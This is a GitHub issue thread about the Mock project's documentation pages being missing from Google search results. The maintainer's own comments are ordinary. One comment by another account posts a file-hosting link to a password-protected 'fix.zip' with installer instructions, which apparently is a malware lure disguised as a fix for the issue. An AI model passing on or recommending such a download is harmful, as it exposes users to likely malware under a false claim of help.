### ISSUE TITLE
I can't google any Mock's documentation page

### ISSUE THREAD

**Issue by praiskup** [fedora-copr/copr#3393]
This is rather weird;  this doesn't seem to be a search optimization task to me!

It seems like our pages https://rpm-software-management.github.io/mock/ are entirely ignored by Google, I always have to go to the GitHub homepage and click the link to our documentation.

**Comment by praiskup** [comment]
Hm, no, I was wrong.  Sorry for the noise.

**Comment by praiskup** [comment]
But still, searching "mock package state plugin" I get at least this with DDG (even though the old docs have more priority):
![Screenshot_20240829_090217](https://github.com/user-attachments/assets/d8b8dd9c-5cc0-4cb0-a37f-54081b11b32c)
Google doesn't give me the right answer at all.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by praiskup** [comment]
Uh, I wanted to create this against Mock anyway.

**Comment by praiskup** [comment]
Moved here: https://github.com/rpm-software-management/mock/issues/1434
